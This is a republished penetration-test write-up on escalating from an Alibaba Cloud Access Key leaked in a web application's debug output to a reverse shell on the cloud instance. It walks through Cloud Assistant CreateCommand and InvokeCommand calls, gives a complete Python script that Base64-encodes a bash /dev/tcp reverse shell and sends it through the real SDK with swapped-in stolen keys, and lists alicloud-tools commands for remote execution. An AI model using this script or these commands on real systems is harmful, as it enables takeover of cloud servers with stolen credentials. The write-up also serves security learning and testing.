Example Analysis: From a Cloud Server (CVM) Leaking an Access Key to Getshell

2025-04-02 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)05/31 Report--

This article walks through an example of going from a cloud server that leaked an Access Key to a shell on the instance. The content is fairly detailed; interested readers can use it for reference, and I hope it is helpful.

0x01 Preface

This was an authorized penetration test. The portal turned up a pile of harmless low-severity findings, but because it exposes a lot of sensitive functionality and nothing special, there are no screenshots of it; the back-end was found by experience rather than by directory brute forcing. A lot of sensitive information is also omitted, so let's start from the back-end.

0x02 Main body

Information gathering on the site: it runs the BT Panel (宝塔), there is no phpMyAdmin vulnerability and no other vulnerability, so there is no shortcut; we have to work through the site honestly.

Opening the page shows a login form. I immediately tried a round of brute forcing with my old dictionary, got nothing, and finally gave up on it.

Directory brute forcing turned up nothing either: empty. Stuck at the login, with no password-reset function and no CMS fingerprint, I was about to give up when I submitted a login blindly and the application threw an error (more precisely, debugging output). Time to perk up.

Summary: luck matters in this line of work.

Keep looking down.

The debug output contains the Redis account and password, and above it a MySQL account and password as well, but those ports are not exposed to the public Internet, so we have to give them up.

What matters are ALIYUN_ACCESSKEYID and ALIYUN_ACCESSKEYSECRET further down. An Access Key pair is a long-lived credential for the Alibaba Cloud OpenAPI: whoever holds it can call the cloud APIs as the account that owns the key, which is what the rest of this article uses.

It can be exploited step by step by hand, but experts have already written tools; if you do not want to read the manual part, skip straight to the last section.

A bit of an aside: doing it by hand has its own fun, and working through it step by step gives you a sense of achievement when you finish. Personally I think manual work is a kind of enjoyment; tools are just for convenience, and for saving time in a red versus blue engagement.

Manual approach

First, import the cloud server into Cloudbility (行云管家), website: https://yun.cloudbility.com/

Steps: select Alibaba Cloud server -> enter the AccessKey ID and AccessKey Secret -> select the host -> import (the name can be anything).

After a successful import the host appears under host management.

Click through to view the details. Here you can reset the operating system password, but as a penetration tester do not click it: never perform an irreversible operation. We only need two pieces of data from this page, the instance ID and the region the instance belongs to, so grab them and move on. Keep reading.

Next, open Alibaba Cloud's API Explorer, a tool Alibaba provides to operations and development staff: https://api.aliyun.com/#/?product=Ecs. Type "command" into the search box on the left. We will use CreateCommand and InvokeCommand: CreateCommand creates a command, and InvokeCommand runs it on an instance. Keep reading.

Name can be anything.

Type is the type of script to execute:

RunBatScript: create a Bat script that runs on a Windows instance.

RunPowerShellScript: create a PowerShell script that runs on a Windows instance.

RunShellScript: create a Shell script that runs on a Linux instance.

CommandContent is the command to execute; note that it must be filled in Base64-encoded.

When you are done, choose Python as the SDK language.

Click "debug SDK sample code"; a Cloud Shell window pops up. Create a CreateCommand.py file there, open it with vim, and fill in accessKeyId and accessSecret.

Running CreateCommand.py returns a RequestId and a CommandId. Note the CommandId; it is needed later when invoking the command.

Open InvokeCommand.

RegionId: the region shown in Cloudbility.

CommandId: the CommandId returned by running CreateCommand.py.

InstanceId: the instance ID obtained from Cloudbility.

Click "debug SDK sample code" again to generate an InvokeCommand.py file, and likewise edit accessKeyId and accessSecret with vim.

After editing, start an nc listener on your port and run InvokeCommand.py.

The command executes, the reverse shell connects back, and we are done.
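The two API calls above, written out as one script so the parameters are visible without clicking through API Explorer. This is an added example, not the article's CreateCommand.py/InvokeCommand.py and not Alibaba's sample code. It builds the CreateCommand parameters (Base64-encoded CommandContent, the Type matching the target OS) and the InvokeCommand parameters (the returned CommandId plus the target InstanceId), and drives them through a pluggable transport: an offline fake that records the calls, and an optional real transport using the aliyun-python-sdk-core CommonRequest API (assumed installed; not exercised offline). The listener address, region, instance ID and returned IDs are constructed sample values. One caveat the article does not mention: Cloud Assistant only reaches instances where its agent is installed and running, so an InvokeCommand that succeeds at the API level can still produce no shell.

```python
import base64
import json

# Added example: the two ECS Cloud Assistant calls the article drives through
# API Explorer. All sample values below are constructed for the demo.
ECS_ENDPOINT = "ecs.aliyuncs.com"
ECS_API_VERSION = "2014-05-26"

# CreateCommand script types named in the article, keyed by target OS family.
SCRIPT_TYPES = {
    "linux": "RunShellScript",
    "windows-powershell": "RunPowerShellScript",
    "windows-bat": "RunBatScript",
}


def reverse_shell_script(listener_host, listener_port):
    """Bash reverse shell the Linux target connects back with (needs a bash
    with /dev/tcp; the article's nc listener receives it)."""
    return f"bash -i >& /dev/tcp/{listener_host}/{listener_port} 0>&1\n"


def build_create_command(name, os_family, script, region_id):
    """Query parameters for CreateCommand. CommandContent must be the Base64
    of the script, which is the detail the article stresses."""
    if os_family not in SCRIPT_TYPES:
        raise ValueError(f"unknown OS family {os_family!r}")
    return {
        "RegionId": region_id,
        "Name": name,
        "Type": SCRIPT_TYPES[os_family],
        "CommandContent": base64.b64encode(script.encode()).decode("ascii"),
    }


def decode_command_content(params):
    """Sanity check before sending: round-trip the Base64 back to text."""
    return base64.b64decode(params["CommandContent"]).decode()


def build_invoke_command(region_id, command_id, instance_id):
    """InvokeCommand takes the CommandId from CreateCommand and the target
    instance; InstanceId is a repeated parameter, hence the '.1' suffix."""
    return {
        "RegionId": region_id,
        "CommandId": command_id,
        "InstanceId.1": instance_id,
    }


def run_flow(send, region_id, instance_id, listener_host, listener_port,
             name="health-check"):
    """CreateCommand, then InvokeCommand, via send(action, params) -> dict."""
    script = reverse_shell_script(listener_host, listener_port)
    created = send("CreateCommand",
                   build_create_command(name, "linux", script, region_id))
    command_id = created["CommandId"]
    invoked = send("InvokeCommand",
                   build_invoke_command(region_id, command_id, instance_id))
    return {"CommandId": command_id, "InvokeId": invoked.get("InvokeId")}


def fake_send(log):
    """Offline transport: records each call and answers with constructed IDs."""
    def send(action, params):
        log.append((action, dict(params)))
        if action == "CreateCommand":
            return {"RequestId": "req-constructed", "CommandId": "c-constructed0001"}
        if action == "InvokeCommand":
            return {"RequestId": "req-constructed", "InvokeId": "t-constructed0001"}
        raise ValueError(action)
    return send


def sdk_send(access_key_id, access_key_secret, region_id):
    """Real transport via aliyun-python-sdk-core's CommonRequest (assumption:
    that package is installed; this path is not exercised offline)."""
    from aliyunsdkcore.client import AcsClient       # type: ignore
    from aliyunsdkcore.request import CommonRequest  # type: ignore
    client = AcsClient(access_key_id, access_key_secret, region_id)

    def send(action, params):
        req = CommonRequest()
        req.set_accept_format("json")
        req.set_domain(ECS_ENDPOINT)
        req.set_method("POST")
        req.set_version(ECS_API_VERSION)
        req.set_action_name(action)
        for key, value in params.items():
            req.add_query_param(key, value)
        return json.loads(client.do_action_with_exception(req))
    return send


if __name__ == "__main__":
    calls = []
    # cn-hangzhou, i-constructed and 198.51.100.10:4444 are sample values.
    print(run_flow(fake_send(calls), "cn-hangzhou", "i-constructed",
                   "198.51.100.10", 4444))
    for action, params in calls:
        print(action, json.dumps(params))
```

To run it for real, replace `fake_send(calls)` with `sdk_send(ak, sk, region)` and have the nc listener up before InvokeCommand is sent. The split between parameter building and transport is deliberate: the parameter dicts are what you can inspect, log and sanity-check (decode the Base64, confirm the Type matches the instance OS) before anything is sent against an account you do not own.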

Tools section

Tool address: https://github.com/iiiusky/alicloud-tools

How to use it:

List all instances (the Access Key ID goes after -a and the secret after -s):

AliCloud-Tools.exe -a <AccessKeyId> -s <AccessKeySecret> ecs --list

Once you have the instance ID you can execute commands on it.

Execute a command:

AliCloud-Tools.exe -a <AccessKeyId> -s <AccessKeySecret> ecs exec -I <InstanceId> -c "command to execute"

That concludes the example analysis of going from a leaked cloud server Access Key to getshell. I hope the above is of some help; if you think the article is good, share it so more people can see it.
